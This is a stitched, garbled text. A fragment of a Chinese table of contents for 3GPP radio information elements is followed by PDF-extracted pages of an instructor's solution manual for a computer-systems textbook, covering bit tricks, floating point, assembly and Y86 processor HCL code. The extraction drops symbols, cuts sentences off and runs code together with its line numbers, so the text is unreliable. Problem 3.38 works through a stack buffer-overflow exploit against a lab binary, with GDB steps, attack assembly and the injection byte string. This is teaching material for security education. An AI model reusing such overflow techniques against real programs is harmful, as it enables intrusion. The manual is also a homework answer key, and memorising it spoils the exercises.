(31)6.9 Cell parameters Id (31)6.10 Common timeslot info (31)6.11 Constant value (31)6.12 CPCH persistence levels (31)6.13 CPCH set info (31)6.14 CPCH Status Indication mode (31)6.15 CSICH Power offset (32)6.16 Default DPCH Offset Value (32)6.17 Downlink channelisation codes (32)6.18 Downlink DPCH info common for all RL (32)6.19 Downlink DPCH info common for all RL Post (32)6.20 Downlink DPCH info common for all RL Pre (32)6.21 Downlink DPCH info for each RL (32)6.22 Downlink DPCH info for each RL Post (33)6.23 Downlink DPCH power control information (33)6.24 Downlink information common for all radio links (33)6.25 Downlink information common for all radio links Post (33)6.26 Downlink information common for all radio links Pre (33)6.27 Downlink information for each radio link (33)6.28 Downlink information for each radio link Post (33)6.29 Void (33)6.30 Downlink PDSCH information (33)6.31 Downlink rate matching restriction information (34)6.32 Downlink Timeslots and Codes (34)6.33 DPCH compressed mode info (34)6.34 DPCH Compressed Mode Status Info (34)6.35 Dynamic persistence level (34)6.36 Frequency info (34)6.37 Individual timeslot info (35)6.38 Individual Timeslot interference (35)6.39 Maximum allowed UL TX power (35)6.40 Void (35)6.41 Midamble shift and burst type (35)6.42 PDSCH Capacity Allocation info (35)6.43 PDSCH code mapping (36)6.44 PDSCH info (36)6.45 PDSCH Power Control info (36)6.46 PDSCH system information (36)6.47 PDSCH with SHO DCH Info (36)6.48 Persistence scaling factors (36)6.49 PICH Info (36)6.50 PICH Power offset (37)6.51 PRACH Channelisation Code List (37)6.52 PRACH info (for RACH) (37)6.53 PRACH partitioning (37)6.54 PRACH power offset (37)6.55 PRACH system information list (37)6.56 Predefined PhyCH configuration (38)6.57 Primary CCPCH info (38)6.58 Primary CCPCH info post (38)6.59 Primary CCPCH TX Power (38)6.60 Primary CPICH info (38)6.61 Primary CPICH Tx power (38)6.62 Primary CPICH usage for channel estimation (38)6.63 PUSCH info (38)6.64 PUSCH Capacity Allocation info (38)6.65 PUSCH power control info (39)6.66 PUSCH system information (39)6.67 RACH transmission parameters (39)6.68 Radio link addition information (39)6.69 Radio link removal information (39)6.70 SCCPCH Information for FACH (39)6.71 Secondary CCPCH info (39)6.72 Secondary CCPCH system information (40)6.73 Secondary CPICH info (40)6.74 Secondary scrambling code (40)6.75 SFN Time info (40)6.76 SSDT cell identity (40)6.77 SSDT information (40)6.78 STTD indicator (40)6.79 TDD open loop power control (41)6.80 TFC Control duration (41)6.81 TFCI Combining Indicator (41)6.82 TGPSI (41)6.83 Time info (41)6.84 Timeslot number (41)6.85 TPC combination index (41)6.86 TSTD indicator (41)6.87 TX Diversity Mode (41)6.88 Uplink DPCH info (41)6.89 Uplink DPCH info Post (42)6.90 Uplink DPCH info Pre (42)6.91 Uplink DPCH power control info (42)6.92 Uplink DPCH power control info Post (42)6.93 Uplink DPCH power control info Pre (42)6.94 Uplink Timeslots and Codes (42)6.95 Uplink Timing Advance (42)6.96 Uplink Timing Advance Control (43)7 测量信息元素 (43)7.1 Additional measurements list (43)7.2 Cell info (43)7.3 Cell measured results (43)7.4 Cell measurement event results (44)7.5 Cell reporting quantities (44)7.6 Cell synchronization information (44)7.7 Event results (44)7.8 FACH measurement occasion info (45)7.9 Filter coefficient (45)7.10 HCS Cell re-selection information (45)7.11 HCS neighboring cell information (45)7.12 HCS Serving cell information (45)7.13 Inter-frequency cell info list (46)7.14 Inter-frequency event identity (46)7.15 Inter-frequency measured results list (46)7.16 Inter-frequency measurement (46)7.17 Inter-frequency measurement event results (47)7.18 Inter-frequency measurement quantity (47)7.19 Inter-frequency measurement reporting criteria (47)7.20 Inter-frequency measurement system information (47)7.21 Inter-frequency reporting quantity (47)7.22 Inter-frequency SET UPDATE (48)7.23 Inter-RAT cell info list (48)7.24 Inter-RAT event identity (48)7.25 Inter-RAT info (48)7.26 Inter-RAT measured results list (48)7.27 Inter-RAT measurement (49)7.28 Inter-RAT measurement event results (49)7.29 Inter-RAT measurement quantity (49)7.30 Inter-RAT measurement reporting criteria (49)7.31 Inter-RAT measurement system information (50)7.32 Inter-RAT reporting quantity (50)7.33 Intra-frequency cell info list (50)7.34 Intra-frequency event identity (50)7.35 Intra-frequency measured results list (50)7.36 Intra-frequency measurement (50)7.37 Intra-frequency measurement event results (51)7.38 Intra-frequency measurement quantity (51)7.39 Intra-frequency measurement reporting criteria (51)7.40 Intra-frequency measurement system information (51)7.41 Intra-frequency reporting quantity (52)7.42 Intra-frequency reporting quantity for RACH reporting (52)7.43 Maximum number of reported cells on RACH (52)7.44 Measured results (52)7.45 Measured results on RACH (52)7.46 Measurement Command (52)7.47 Measurement control system information (53)7.48 Measurement Identity (53)7.49 Measurement reporting mode (53)7.50 Measurement Type (53)7.51 Measurement validity (53)7.52 Observed time difference to GSM cell (53)7.53 Periodical reporting criteria (53)7.54 Primary CCPCH RSCP info (54)7.55 Quality measured results list (54)7.56 Quality measurement (54)7.57 Quality measurement event results (54)7.58 Quality measurement reporting criteria (54)7.59 Quality reporting quantity (54)7.60 Reference time difference to cell (54)7.61 Reporting Cell Status (55)7.62 Reporting information for state CELL_DCH (55)7.63 SFN-SFN observed time difference (55)7.64 Time to trigger (55)7.65 Timeslot ISCP info (55)7.66 Traffic volume event identity (55)7.67 Traffic volume measured results list (55)7.68 Traffic volume measurement (55)7.69 Traffic volume measurement event results (56)7.70 Traffic volume measurement object (56)7.71 Traffic volume measurement quantity (56)7.72 Traffic volume measurement reporting criteria (56)7.73 Traffic volume measurement system information (56)7.74 Traffic volume reporting quantity (56)7.75 UE internal event identity (56)7.76 UE internal measured results (57)7.77 UE internal measurement (57)7.78 UE internal measurement event results (57)7.79 UE internal measurement quantity (57)7.80 UE internal measurement reporting criteria (57)7.81 Void (58)7.82 UE Internal reporting quantity (58)7.83 UE Rx-Tx time difference type 1 (58)7.84 UE Rx-Tx time difference type 2 (58)7.85 UE Transmitted Power info (58)7.86 UE positioning Ciphering info (58)7.87 UE positioning Error (58)7.88 UE positioning GPS acquisition assistance (59)7.89 UE positioning GPS almanac (59)7.90 UE positioning GPS assistance data (59)7.91 UE positioning GPS DGPS corrections (59)7.92 UE positioning GPS ionospheric model (59)7.93 UE positioning GPS measured results (59)7.94 UE positioning GPS navigation model (60)7.95 UE positioning GPS real-time integrity (60)7.96 UE positioning GPS reference time (60)7.97 UE positioning GPS UTC model (61)7.98 UE positioning IPDL parameters (61)7.99 UE positioning measured results (61)7.100 UE positioning measurement (61)7.101 UE positioning measurement event results (61)7.102 Void (62)7.103 UE positioning OTDOA assistance data for UE-assisted (62)7.104 Void (62)7.105 UE positioning OTDOA measured results (62)7.106 UE positioning OTDOA neighbor cell info (62)7.107 UE positioning OTDOA quality (63)7.108 UE positioning OTDOA reference cell info (63)7.109 UE positioning position estimate info (64)7.110 UE positioning reporting criteria (64)7.111 UE positioning reporting quantity (64)7.112 T ADV info (65)8 其它信息元素 (65)8.1 BCCH modification info (65)8.2 BSIC (65)8.3 CBS DRX Level 1 information (65)8.4 Cell Value tag (65)8.5 Inter-RAT change failure (65)8.6 Inter-RAT handover failure (66)8.7 Inter-RAT UE radio access capability (66)8.8 Void (66)8.9 MIB Value tag (66)8.10 PLMN Value tag (66)8.11 Predefined configuration identity and value tag (66)8.12 Protocol error information (66)8.13 References to other system information blocks (66)8.14 References to other system information blocks and scheduling blocks (67)8.15 Rplmn information (67)8.16 Scheduling information (67)8.17 SEG COUNT (67)8.18 Segment index (67)8.19 SIB data fixed (67)8.20 SIB data variable (67)8.21 SIB type (67)8.22 SIB type SIBs only (67)9 ANSI-41 Information elements (68)10 Multiplicity values and type constraint values (68)信息元素功能性定义消息是由多个信息元素组合而成,信息元素根据其功能的不同划分为:核心网域信息元素、UTRAN 移动信息元素、UE 信息元素、无线承载信息元素、传输信道信息元素、物理信道信息元素和测量信息元素。
answer
Computer Systems:A Programmer’s PerspectiveInstructor’s Solution Manual1Randal E.BryantDavid R.O’HallaronDecember4,20031Copyright c2003,R.E.Bryant,D.R.O’Hallaron.All rights reserved.2Chapter1Solutions to Homework ProblemsThe text uses two different kinds of exercises:Practice Problems.These are problems that are incorporated directly into the text,with explanatory solutions at the end of each chapter.Our intention is that students will work on these problems as they read the book.Each one highlights some particular concept.Homework Problems.These are found at the end of each chapter.They vary in complexity from simple drills to multi-week labs and are designed for instructors to give as assignments or to use as recitation examples.This document gives the solutions to the homework problems.1.1Chapter1:A Tour of Computer Systems1.2Chapter2:Representing and Manipulating InformationProblem2.40Solution:This exercise should be a straightforward variation on the existing code.2CHAPTER1.SOLUTIONS TO HOMEWORK PROBLEMS1011void show_double(double x)12{13show_bytes((byte_pointer)&x,sizeof(double));14}code/data/show-ans.c 1int is_little_endian(void)2{3/*MSB=0,LSB=1*/4int x=1;56/*Return MSB when big-endian,LSB when little-endian*/7return(int)(*(char*)&x);8}1.2.CHAPTER2:REPRESENTING AND MANIPULATING INFORMATION3 There are many solutions to this problem,but it is a little bit tricky to write one that works for any word size.Here is our solution:code/data/shift-ans.c The above code peforms a right shift of a word in which all bits are set to1.If the shift is arithmetic,the resulting word will still have all bits set to1.Problem2.45Solution:This problem illustrates some of the challenges of writing portable code.The fact that1<<32yields0on some32-bit machines and1on others is common source of bugs.A.The C standard does not define the effect of a shift by32of a32-bit datum.On the SPARC(andmany other machines),the expression x<<k shifts by,i.e.,it ignores all but the least significant5bits of the shift amount.Thus,the expression1<<32yields1.pute beyond_msb as2<<31.C.We cannot shift by more than15bits at a time,but we can compose multiple shifts to get thedesired effect.Thus,we can compute set_msb as2<<15<<15,and beyond_msb as set_msb<<1.Problem2.46Solution:This problem highlights the difference between zero extension and sign extension.It also provides an excuse to show an interesting trick that compilers often use to use shifting to perform masking and sign extension.A.The function does not perform any sign extension.For example,if we attempt to extract byte0fromword0xFF,we will get255,rather than.B.The following code uses a well-known trick for using shifts to isolate a particular range of bits and toperform sign extension at the same time.First,we perform a left shift so that the most significant bit of the desired byte is at bit position31.Then we right shift by24,moving the byte into the proper position and peforming sign extension at the same time.4CHAPTER1.SOLUTIONS TO HOMEWORK PROBLEMS 3int left=word<<((3-bytenum)<<3);4return left>>24;5}Problem2.48Solution:This problem lets students rework the proof that complement plus increment performs negation.We make use of the property that two’s complement addition is associative,commutative,and has additive ing C notation,if we define y to be x-1,then we have˜y+1equal to-y,and hence˜y equals -y+1.Substituting gives the expression-(x-1)+1,which equals-x.Problem2.49Solution:This problem requires a fairly deep understanding of two’s complement arithmetic.Some machines only provide one form of multiplication,and hence the trick shown in the code here is actually required to perform that actual form.As seen in Equation2.16we have.Thefinal term has no effect on the-bit representation of,but the middle term represents a correction factor that must be added to the high order bits.This is implemented as follows:code/data/uhp-ans.c Problem2.50Solution:Patterns of the kind shown here frequently appear in compiled code.1.2.CHAPTER2:REPRESENTING AND MANIPULATING INFORMATION5A.:x+(x<<2)B.:x+(x<<3)C.:(x<<4)-(x<<1)D.:(x<<3)-(x<<6)Problem2.51Solution:Bit patterns similar to these arise in many applications.Many programmers provide them directly in hex-adecimal,but it would be better if they could express them in more abstract ways.A..˜((1<<k)-1)B..((1<<k)-1)<<jProblem2.52Solution:Byte extraction and insertion code is useful in many contexts.Being able to write this sort of code is an important skill to foster.code/data/rbyte-ans.c Problem2.53Solution:These problems are fairly tricky.They require generating masks based on the shift amounts.Shift value k equal to0must be handled as a special case,since otherwise we would be generating the mask by performing a left shift by32.6CHAPTER1.SOLUTIONS TO HOMEWORK PROBLEMS 1unsigned srl(unsigned x,int k)2{3/*Perform shift arithmetically*/4unsigned xsra=(int)x>>k;5/*Make mask of low order32-k bits*/6unsigned mask=k?((1<<(32-k))-1):˜0;78return xsra&mask;9}code/data/rshift-ans.c 1int sra(int x,int k)2{3/*Perform shift logically*/4int xsrl=(unsigned)x>>k;5/*Make mask of high order k bits*/6unsigned mask=k?˜((1<<(32-k))-1):0;78return(x<0)?mask|xsrl:xsrl;9}.1.2.CHAPTER2:REPRESENTING AND MANIPULATING INFORMATION7B.(a)For,we have,,code/data/floatge-ans.c 1int float_ge(float x,float y)2{3unsigned ux=f2u(x);4unsigned uy=f2u(y);5unsigned sx=ux>>31;6unsigned sy=uy>>31;78return9(ux<<1==0&&uy<<1==0)||/*Both are zero*/10(!sx&&sy)||/*x>=0,y<0*/11(!sx&&!sy&&ux>=uy)||/*x>=0,y>=0*/12(sx&&sy&&ux<=uy);/*x<0,y<0*/13},8CHAPTER1.SOLUTIONS TO HOMEWORK PROBLEMS This exercise is of practical value,since Intel-compatible processors perform all of their arithmetic in ex-tended precision.It is interesting to see how adding a few more bits to the exponent greatly increases the range of values that can be represented.Description Extended precisionValueSmallest denorm.Largest norm.Problem2.59Solution:We have found that working throughfloating point representations for small word sizes is very instructive. Problems such as this one help make the description of IEEEfloating point more concrete.Description8000Smallest value4700Largest denormalized———code/data/fpwr2-ans.c1.3.CHAPTER3:MACHINE LEVEL REPRESENTATION OF C PROGRAMS91/*Compute2**x*/2float fpwr2(int x){34unsigned exp,sig;5unsigned u;67if(x<-149){8/*Too small.Return0.0*/9exp=0;10sig=0;11}else if(x<-126){12/*Denormalized result*/13exp=0;14sig=1<<(x+149);15}else if(x<128){16/*Normalized result.*/17exp=x+127;18sig=0;19}else{20/*Too big.Return+oo*/21exp=255;22sig=0;23}24u=exp<<23|sig;25return u2f(u);26}10CHAPTER1.SOLUTIONS TO HOMEWORK PROBLEMS int decode2(int x,int y,int z){int t1=y-z;int t2=x*t1;int t3=(t1<<31)>>31;int t4=t3ˆt2;return t4;}Problem3.32Solution:This code example demonstrates one of the pedagogical challenges of using a compiler to generate assembly code examples.Seemingly insignificant changes in the C code can yield very different results.Of course, students will have to contend with this property as work with machine-generated assembly code anyhow. They will need to be able to decipher many different code patterns.This problem encourages them to think in abstract terms about one such pattern.The following is an annotated version of the assembly code:1movl8(%ebp),%edx x2movl12(%ebp),%ecx y3movl%edx,%eax4subl%ecx,%eax result=x-y5cmpl%ecx,%edx Compare x:y6jge.L3if>=goto done:7movl%ecx,%eax8subl%edx,%eax result=y-x9.L3:done:A.When,it will computefirst and then.When it just computes.B.The code for then-statement gets executed unconditionally.It then jumps over the code for else-statement if the test is false.C.then-statementt=test-expr;if(t)goto done;else-statementdone:D.The code in then-statement must not have any side effects,other than to set variables that are also setin else-statement.1.3.CHAPTER3:MACHINE LEVEL REPRESENTATION OF C PROGRAMS11Problem3.33Solution:This problem requires students to reason about the code fragments that implement the different branches of a switch statement.For this code,it also requires understanding different forms of pointer dereferencing.A.In line29,register%edx is copied to register%eax as the return value.From this,we can infer that%edx holds result.B.The original C code for the function is as follows:1/*Enumerated type creates set of constants numbered0and upward*/2typedef enum{MODE_A,MODE_B,MODE_C,MODE_D,MODE_E}mode_t;34int switch3(int*p1,int*p2,mode_t action)5{6int result=0;7switch(action){8case MODE_A:9result=*p1;10*p1=*p2;11break;12case MODE_B:13*p2+=*p1;14result=*p2;15break;16case MODE_C:17*p2=15;18result=*p1;19break;20case MODE_D:21*p2=*p1;22/*Fall Through*/23case MODE_E:24result=17;25break;26default:27result=-1;28}29return result;30}Problem3.34Solution:This problem gives students practice analyzing disassembled code.The switch statement contains all the features one can imagine—cases with multiple labels,holes in the range of possible case values,and cases that fall through.12CHAPTER1.SOLUTIONS TO HOMEWORK PROBLEMS 1int switch_prob(int x)2{3int result=x;45switch(x){6case50:7case52:8result<<=2;9break;10case53:11result>>=2;12break;13case54:14result*=3;15/*Fall through*/16case55:17result*=result;18/*Fall through*/19default:20result+=10;21}2223return result;24}code/asm/varprod-ans.c 1int var_prod_ele_opt(var_matrix A,var_matrix B,int i,int k,int n) 2{3int*Aptr=&A[i*n];4int*Bptr=&B[k];5int result=0;6int cnt=n;78if(n<=0)9return result;1011do{12result+=(*Aptr)*(*Bptr);13Aptr+=1;14Bptr+=n;15cnt--;1.3.CHAPTER3:MACHINE LEVEL REPRESENTATION OF C PROGRAMS13 16}while(cnt);1718return result;19}code/asm/structprob-ans.c 1typedef struct{2int idx;3int x[4];4}a_struct;14CHAPTER1.SOLUTIONS TO HOMEWORK PROBLEMS 1/*Read input line and write it back*/2/*Code will work for any buffer size.Bigger is more time-efficient*/ 3#define BUFSIZE644void good_echo()5{6char buf[BUFSIZE];7int i;8while(1){9if(!fgets(buf,BUFSIZE,stdin))10return;/*End of file or error*/11/*Print characters in buffer*/12for(i=0;buf[i]&&buf[i]!=’\n’;i++)13if(putchar(buf[i])==EOF)14return;/*Error*/15if(buf[i]==’\n’){16/*Reached terminating newline*/17putchar(’\n’);18return;19}20}21}An alternative implementation is to use getchar to read the characters one at a time.Problem3.38Solution:Successfully mounting a buffer overflow attack requires understanding many aspects of machine-level pro-grams.It is quite intriguing that by supplying a string to one function,we can alter the behavior of another function that should always return afixed value.In assigning this problem,you should also give students a stern lecture about ethical computing practices and dispell any notion that hacking into systems is a desirable or even acceptable thing to do.Our solution starts by disassembling bufbomb,giving the following code for getbuf: 1080484f4<getbuf>:280484f4:55push%ebp380484f5:89e5mov%esp,%ebp480484f7:83ec18sub$0x18,%esp580484fa:83c4f4add$0xfffffff4,%esp680484fd:8d45f4lea0xfffffff4(%ebp),%eax78048500:50push%eax88048501:e86a ff ff ff call8048470<getxs>98048506:b801000000mov$0x1,%eax10804850b:89ec mov%ebp,%esp11804850d:5d pop%ebp12804850e:c3ret13804850f:90nopWe can see on line6that the address of buf is12bytes below the saved value of%ebp,which is4bytes below the return address.Our strategy then is to push a string that contains12bytes of code,the saved value1.3.CHAPTER3:MACHINE LEVEL REPRESENTATION OF C PROGRAMS15 of%ebp,and the address of the start of the buffer.To determine the relevant values,we run GDB as follows:1.First,we set a breakpoint in getbuf and run the program to that point:(gdb)break getbuf(gdb)runComparing the stopping point to the disassembly,we see that it has already set up the stack frame.2.We get the value of buf by computing a value relative to%ebp:(gdb)print/x(%ebp+12)This gives0xbfffefbc.3.Wefind the saved value of register%ebp by dereferencing the current value of this register:(gdb)print/x*$ebpThis gives0xbfffefe8.4.Wefind the value of the return pointer on the stack,at offset4relative to%ebp:(gdb)print/x*((int*)$ebp+1)This gives0x8048528We can now put this information together to generate assembly code for our attack:1pushl$0x8048528Put correct return pointer back on stack2movl$0xdeadbeef,%eax Alter return value3ret Re-execute return4.align4Round up to125.long0xbfffefe8Saved value of%ebp6.long0xbfffefbc Location of buf7.long0x00000000PaddingNote that we have used the.align statement to get the assembler to insert enough extra bytes to use up twelve bytes for the code.We added an extra4bytes of0s at the end,because in some cases OBJDUMP would not generate the complete byte pattern for the data.These extra bytes(plus the termininating null byte)will overflow into the stack frame for test,but they will not affect the program behavior. Assembling this code and disassembling the object code gives us the following:10:6828850408push$0x804852825:b8ef be ad de mov$0xdeadbeef,%eax3a:c3ret4b:90nop Byte inserted for alignment.5c:e8ef ff bf bc call0xbcc00000Invalid disassembly.611:ef out%eax,(%dx)Trying to diassemble712:ff(bad)data813:bf00000000mov$0x0,%edi16CHAPTER1.SOLUTIONS TO HOMEWORK PROBLEMS From this we can read off the byte sequence:6828850408b8ef be ad de c390e8ef ff bf bc ef ff bf00000000Problem3.39Solution:This problem is a variant on the asm examples in the text.The code is actually fairly simple.It relies on the fact that asm outputs can be arbitrary lvalues,and hence we can use dest[0]and dest[1]directly in the output list.code/asm/asmprobs-ans.c Problem3.40Solution:For this example,students essentially have to write the entire function in assembly.There is no(apparent) way to interface between thefloating point registers and the C code using extended asm.code/asm/fscale.c1.4.CHAPTER4:PROCESSOR ARCHITECTURE17 1.4Chapter4:Processor ArchitectureProblem4.32Solution:This problem makes students carefully examine the tables showing the computation stages for the different instructions.The steps for iaddl are a hybrid of those for irmovl and OPl.StageFetchrA:rB M PCvalP PCExecuteR rB valEPC updateleaveicode:ifun M PCDecodevalB RvalE valBMemoryWrite backR valMPC valPProblem4.34Solution:The following HCL code includes implementations of both the iaddl instruction and the leave instruc-tions.The implementations are fairly straightforward given the computation steps listed in the solutions to problems4.32and4.33.You can test the solutions using the test code in the ptest subdirectory.Make sure you use command line argument‘-i.’18CHAPTER1.SOLUTIONS TO HOMEWORK PROBLEMS 1####################################################################2#HCL Description of Control for Single Cycle Y86Processor SEQ#3#Copyright(C)Randal E.Bryant,David R.O’Hallaron,2002#4####################################################################56##This is the solution for the iaddl and leave problems78####################################################################9#C Include’s.Don’t alter these#10#################################################################### 1112quote’#include<stdio.h>’13quote’#include"isa.h"’14quote’#include"sim.h"’15quote’int sim_main(int argc,char*argv[]);’16quote’int gen_pc(){return0;}’17quote’int main(int argc,char*argv[])’18quote’{plusmode=0;return sim_main(argc,argv);}’1920####################################################################21#Declarations.Do not change/remove/delete any of these#22#################################################################### 2324#####Symbolic representation of Y86Instruction Codes#############25intsig INOP’I_NOP’26intsig IHALT’I_HALT’27intsig IRRMOVL’I_RRMOVL’28intsig IIRMOVL’I_IRMOVL’29intsig IRMMOVL’I_RMMOVL’30intsig IMRMOVL’I_MRMOVL’31intsig IOPL’I_ALU’32intsig IJXX’I_JMP’33intsig ICALL’I_CALL’34intsig IRET’I_RET’35intsig IPUSHL’I_PUSHL’36intsig IPOPL’I_POPL’37#Instruction code for iaddl instruction38intsig IIADDL’I_IADDL’39#Instruction code for leave instruction40intsig ILEAVE’I_LEAVE’4142#####Symbolic representation of Y86Registers referenced explicitly##### 43intsig RESP’REG_ESP’#Stack Pointer44intsig REBP’REG_EBP’#Frame Pointer45intsig RNONE’REG_NONE’#Special value indicating"no register"4647#####ALU Functions referenced explicitly##### 48intsig ALUADD’A_ADD’#ALU should add its arguments4950#####Signals that can be referenced by control logic####################1.4.CHAPTER4:PROCESSOR ARCHITECTURE195152#####Fetch stage inputs#####53intsig pc’pc’#Program counter54#####Fetch stage computations#####55intsig icode’icode’#Instruction control code56intsig ifun’ifun’#Instruction function57intsig rA’ra’#rA field from instruction58intsig rB’rb’#rB field from instruction59intsig valC’valc’#Constant from instruction60intsig valP’valp’#Address of following instruction 6162#####Decode stage computations#####63intsig valA’vala’#Value from register A port64intsig valB’valb’#Value from register B port 6566#####Execute stage computations#####67intsig valE’vale’#Value computed by ALU68boolsig Bch’bcond’#Branch test6970#####Memory stage computations#####71intsig valM’valm’#Value read from memory727374####################################################################75#Control Signal Definitions.#76#################################################################### 7778################Fetch Stage################################### 7980#Does fetched instruction require a regid byte?81bool need_regids=82icode in{IRRMOVL,IOPL,IPUSHL,IPOPL,83IIADDL,84IIRMOVL,IRMMOVL,IMRMOVL};8586#Does fetched instruction require a constant word?87bool need_valC=88icode in{IIRMOVL,IRMMOVL,IMRMOVL,IJXX,ICALL,IIADDL};8990bool instr_valid=icode in91{INOP,IHALT,IRRMOVL,IIRMOVL,IRMMOVL,IMRMOVL,92IIADDL,ILEAVE,93IOPL,IJXX,ICALL,IRET,IPUSHL,IPOPL};9495################Decode Stage################################### 9697##What register should be used as the A source?98int srcA=[99icode in{IRRMOVL,IRMMOVL,IOPL,IPUSHL}:rA;20CHAPTER1.SOLUTIONS TO HOMEWORK PROBLEMS 101icode in{IPOPL,IRET}:RESP;1021:RNONE;#Don’t need register103];104105##What register should be used as the B source?106int srcB=[107icode in{IOPL,IRMMOVL,IMRMOVL}:rB;108icode in{IIADDL}:rB;109icode in{IPUSHL,IPOPL,ICALL,IRET}:RESP;110icode in{ILEAVE}:REBP;1111:RNONE;#Don’t need register112];113114##What register should be used as the E destination?115int dstE=[116icode in{IRRMOVL,IIRMOVL,IOPL}:rB;117icode in{IIADDL}:rB;118icode in{IPUSHL,IPOPL,ICALL,IRET}:RESP;119icode in{ILEAVE}:RESP;1201:RNONE;#Don’t need register121];122123##What register should be used as the M destination?124int dstM=[125icode in{IMRMOVL,IPOPL}:rA;126icode in{ILEAVE}:REBP;1271:RNONE;#Don’t need register128];129130################Execute Stage###################################131132##Select input A to ALU133int aluA=[134icode in{IRRMOVL,IOPL}:valA;135icode in{IIRMOVL,IRMMOVL,IMRMOVL}:valC;136icode in{IIADDL}:valC;137icode in{ICALL,IPUSHL}:-4;138icode in{IRET,IPOPL}:4;139icode in{ILEAVE}:4;140#Other instructions don’t need ALU141];142143##Select input B to ALU144int aluB=[145icode in{IRMMOVL,IMRMOVL,IOPL,ICALL,146IPUSHL,IRET,IPOPL}:valB;147icode in{IIADDL,ILEAVE}:valB;148icode in{IRRMOVL,IIRMOVL}:0;149#Other instructions don’t need ALU1.4.CHAPTER4:PROCESSOR ARCHITECTURE21151152##Set the ALU function153int alufun=[154icode==IOPL:ifun;1551:ALUADD;156];157158##Should the condition codes be updated?159bool set_cc=icode in{IOPL,IIADDL};160161################Memory Stage###################################162163##Set read control signal164bool mem_read=icode in{IMRMOVL,IPOPL,IRET,ILEAVE};165166##Set write control signal167bool mem_write=icode in{IRMMOVL,IPUSHL,ICALL};168169##Select memory address170int mem_addr=[171icode in{IRMMOVL,IPUSHL,ICALL,IMRMOVL}:valE;172icode in{IPOPL,IRET}:valA;173icode in{ILEAVE}:valA;174#Other instructions don’t need address175];176177##Select memory input data178int mem_data=[179#Value from register180icode in{IRMMOVL,IPUSHL}:valA;181#Return PC182icode==ICALL:valP;183#Default:Don’t write anything184];185186################Program Counter Update############################187188##What address should instruction be fetched at189190int new_pc=[191#e instruction constant192icode==ICALL:valC;193#Taken e instruction constant194icode==IJXX&&Bch:valC;195#Completion of RET e value from stack196icode==IRET:valM;197#Default:Use incremented PC1981:valP;199];22CHAPTER 1.SOLUTIONS TO HOMEWORK PROBLEMSME DMispredictE DM E DM M E D E DMGen./use 1W E DM Gen./use 2WE DM Gen./use 3W Figure 1.1:Pipeline states for special control conditions.The pairs connected by arrows can arisesimultaneously.code/arch/pipe-nobypass-ans.hcl1.4.CHAPTER4:PROCESSOR ARCHITECTURE232#At most one of these can be true.3bool F_bubble=0;4bool F_stall=5#Stall if either operand source is destination of6#instruction in execute,memory,or write-back stages7d_srcA!=RNONE&&d_srcA in8{E_dstM,E_dstE,M_dstM,M_dstE,W_dstM,W_dstE}||9d_srcB!=RNONE&&d_srcB in10{E_dstM,E_dstE,M_dstM,M_dstE,W_dstM,W_dstE}||11#Stalling at fetch while ret passes through pipeline12IRET in{D_icode,E_icode,M_icode};1314#Should I stall or inject a bubble into Pipeline Register D?15#At most one of these can be true.16bool D_stall=17#Stall if either operand source is destination of18#instruction in execute,memory,or write-back stages19#but not part of mispredicted branch20!(E_icode==IJXX&&!e_Bch)&&21(d_srcA!=RNONE&&d_srcA in22{E_dstM,E_dstE,M_dstM,M_dstE,W_dstM,W_dstE}||23d_srcB!=RNONE&&d_srcB in24{E_dstM,E_dstE,M_dstM,M_dstE,W_dstM,W_dstE});2526bool D_bubble=27#Mispredicted branch28(E_icode==IJXX&&!e_Bch)||29#Stalling at fetch while ret passes through pipeline30!(E_icode in{IMRMOVL,IPOPL}&&E_dstM in{d_srcA,d_srcB})&&31#but not condition for a generate/use hazard32!(d_srcA!=RNONE&&d_srcA in33{E_dstM,E_dstE,M_dstM,M_dstE,W_dstM,W_dstE}||34d_srcB!=RNONE&&d_srcB in35{E_dstM,E_dstE,M_dstM,M_dstE,W_dstM,W_dstE})&&36IRET in{D_icode,E_icode,M_icode};3738#Should I stall or inject a bubble into Pipeline Register E?39#At most one of these can be true.40bool E_stall=0;41bool E_bubble=42#Mispredicted branch43(E_icode==IJXX&&!e_Bch)||44#Inject bubble if either operand source is destination of45#instruction in execute,memory,or write back stages46d_srcA!=RNONE&&47d_srcA in{E_dstM,E_dstE,M_dstM,M_dstE,W_dstM,W_dstE}|| 48d_srcB!=RNONE&&49d_srcB in{E_dstM,E_dstE,M_dstM,M_dstE,W_dstM,W_dstE};5024CHAPTER1.SOLUTIONS TO HOMEWORK PROBLEMS 52#At most one of these can be true.53bool M_stall=0;54bool M_bubble=0;code/arch/pipe-full-ans.hcl 1####################################################################2#HCL Description of Control for Pipelined Y86Processor#3#Copyright(C)Randal E.Bryant,David R.O’Hallaron,2002#4####################################################################56##This is the solution for the iaddl and leave problems78####################################################################9#C Include’s.Don’t alter these#10#################################################################### 1112quote’#include<stdio.h>’13quote’#include"isa.h"’14quote’#include"pipeline.h"’15quote’#include"stages.h"’16quote’#include"sim.h"’17quote’int sim_main(int argc,char*argv[]);’18quote’int main(int argc,char*argv[]){return sim_main(argc,argv);}’1920####################################################################21#Declarations.Do not change/remove/delete any of these#22#################################################################### 2324#####Symbolic representation of Y86Instruction Codes#############25intsig INOP’I_NOP’26intsig IHALT’I_HALT’27intsig IRRMOVL’I_RRMOVL’28intsig IIRMOVL’I_IRMOVL’29intsig IRMMOVL’I_RMMOVL’30intsig IMRMOVL’I_MRMOVL’31intsig IOPL’I_ALU’32intsig IJXX’I_JMP’33intsig ICALL’I_CALL’34intsig IRET’I_RET’1.4.CHAPTER4:PROCESSOR ARCHITECTURE25 36intsig IPOPL’I_POPL’37#Instruction code for iaddl instruction38intsig IIADDL’I_IADDL’39#Instruction code for leave instruction40intsig ILEAVE’I_LEAVE’4142#####Symbolic representation of Y86Registers referenced explicitly##### 43intsig RESP’REG_ESP’#Stack Pointer44intsig REBP’REG_EBP’#Frame Pointer45intsig RNONE’REG_NONE’#Special value indicating"no register"4647#####ALU Functions referenced explicitly##########################48intsig ALUADD’A_ADD’#ALU should add its arguments4950#####Signals that can be referenced by control logic##############5152#####Pipeline Register F##########################################5354intsig F_predPC’pc_curr->pc’#Predicted value of PC5556#####Intermediate Values in Fetch Stage###########################5758intsig f_icode’if_id_next->icode’#Fetched instruction code59intsig f_ifun’if_id_next->ifun’#Fetched instruction function60intsig f_valC’if_id_next->valc’#Constant data of fetched instruction 61intsig f_valP’if_id_next->valp’#Address of following instruction 6263#####Pipeline Register D##########################################64intsig D_icode’if_id_curr->icode’#Instruction code65intsig D_rA’if_id_curr->ra’#rA field from instruction66intsig D_rB’if_id_curr->rb’#rB field from instruction67intsig D_valP’if_id_curr->valp’#Incremented PC6869#####Intermediate Values in Decode Stage#########################7071intsig 